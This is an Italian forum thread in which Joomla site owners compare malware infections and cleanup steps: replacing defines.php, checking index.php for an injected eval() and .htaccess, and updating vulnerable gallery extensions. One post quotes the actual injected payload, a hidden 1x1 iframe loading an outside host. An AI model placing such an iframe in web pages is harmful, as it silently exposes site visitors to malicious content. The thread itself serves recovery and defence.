[RISOLTO] problema di virus sul sito

[Otrebor1969]

Utilizzando antivirus K...Y non trova niente.. Poi ho scaricato Malawarebytes free e mi ha già trovato un virus... La ricerca è ancora in corso. Poi ti dirò di che virus si tratta... Nel frattempo non sto muovendo un unghia sul sito... Non si sa mai

[Argon]

secondo me state facendo un casino della madonna.

iframe con qs cosa nn centra nulla, se guardi il codice non è un'iframe..

virus che fanno cose simili ce ne sono a pacchi

M.

il mio si è rivelato essere iframe, anche se all'inizio il codice era differente...
sicuramente staremo facendo un casino grande però uno fa dei tentativi, anche dettati dalla disperazione...
se ci fosse una soluzione certa saremmo già altrove

[ilrestodiniente]

Scusatemi se mi intrometto ma ho lo stesso problema su altervista. Avevo un vecchio sito che ho sostituito con uno realizzato in joomla. OIra i vecchi link su google mi danno il problema. Siccome non sono un falco non mi è chiara la procedura da seguire. Domando: ho il back del sito su chiavetta se scannerizzo la chiavetta con malawarebytes e antivirus, piallo il server, formatto il pc e reinstallo tutto su altervista risolvo qualcosa?
Grazie per le eventuali risposte.

[mau_develop]

Avevo un vecchio sito che ho sostituito con uno realizzato in joomla. OIra i vecchi link su google mi danno il problema.
--------------------------------------------------

no, aspetta... qualcosa non mi quadra...

in che senso i vecchi link? guarda che non è google il problema o i link del sito che raccoglie...

rimuovi il file define.php con uno "fresco" preso da un pacchetto nuovo
aggiorna joomla, core e addons che hai installato

M.

[BebaTQ]

Ciao ragazzi, io avevo aggiornato alla 15 da una 11, ma non avevo visto il problema della Oziogallery (comunque aggiornata alla 2.3) e mi sono beccato lo schifo p3p0.

Rimosso il file della Ozio, nessun problema nel defines.php e p3p0 era ancora lì.
Il maledetto aveva messo l'eval() all'interno dell'index.php, quindi per chi fosse in palla (come lo sono stato io ) bisogna controllare anche quello...

[gauss]

grazie Mau!
anch'io avevo lo stesso problema, risolto in 10 min

@pumacocina metti sulla prima pagina la soluzione e di aggiornare i componenti tipo Ozio Gallery2 per evitare bug simili

ciao ragazzi!

[gippy88]

oltre a controllare il file defines.php nella cartella includes, controllate il vostro .htaccess

[mau_develop]

infatti, non è detto che sia identico ovunque, l'importante è capire ... poi basta un minimo di pazienza e si risolve.

M.

[domge]

mi sono beccato lo schifo p3p0.
Rimosso il file della Ozio, nessun problema nel defines.php e p3p0 era ancora lì.

Scusatemi se non sono sul post giusto.
Non prendete per oro colato quanto di seguto scritto da me, ma a qualcuno potrebbe servire.
Avevo il sito hackerato, ovvero non raggiungibile dai motori di ricerca. Questa è la sesta o settima volta circa in 8 mesi.
Ogni volta, per ripristinare, rimettevo l'originale del file defines.php (non ricordo molto bese se era proprio questo il file, ho seguito post su questo furum) ma comunque tutto tornava a posto.
Mi ricordo che cambiai anche i permessi al file e per qualche mese non ho avuto problemi apparenti.
Con l'ultimo attacco, pero, non sono riuscito a risolvere con la semplice sostituzione del file.
Ho ricopiato tutti i file della ver 1.5.20 ma nulla di concreto.
Per puro caso, ho disistallato il componente RSGALLERY, perche non mi serviva e, magicamente, tutto è tornato raggiungibile dai motori di ricerca. Speriamo di aver, per ora, risolto.
saluti

 

[klacid]

Ciao, anche io sono stato attaccato da un malware, su un login che possiede 4 siti internet.... è stato modificato il file index.php e anche dell'amministratore suppongo poichè andando su http://.../administrator mi compare lo stesso messaggio, Parse error: syntax error, unexpected '<' in /web/htdocs/www.-------.it/home/index.php on line 88 . Ho cambiato le password come prima cosa di questo login. MA ora come posso ripristinare tutto visto che il malware ha infettato anche le copie in ftp fatte in automatico?

[mau_develop]

non devi appenderti a un post leggendo il titolo e mettendoti in coda, non è un servizio a ticket.
Se hai già letto tutti i post (compreso quello in evidenza in questa sezione) e non hai trovato risposta probabilmente non c'è.

Ovvero se è tutto infettato o sospetto non c'è nulla da fare che spulciare a mano i contenuti file per file, riga di db per riga di db.
Se leggi il post in testa alla sezione suggerisco a nche dei modi di recupero "a rischio" ma più rapidi.

M.

[klacid]

Ciao, grazie per la dritta non sono pratico dei forum lo ammetto
Volevo informarvi che ho risolto, a differenza di altri utenti il mio problema era nell'index.php sia del sito che dell'admin era infetto da questo iframe
-----------------------------------------------
<html><body><iframe src='http://trafflist.com//' height=1 width=1 border=dsfsd0 scrolling=no></iframe></body></html>
------------------------------------------------
si era aggiunto infondo all'index. Dopo aver effettuato delle ricerche è partito tutto da un trojan che era situato come nella (crack come ha colpito puma)

Grazie a tutti per il tempo e lo spazio concesso!

[YtseDrummer]

Ciao klacid, io ho avuto il tuo stesso problema su due hosting diversi sia su J1.6 che J1.5.
Puoi darmi info sulle cause di questo problema?

Grazie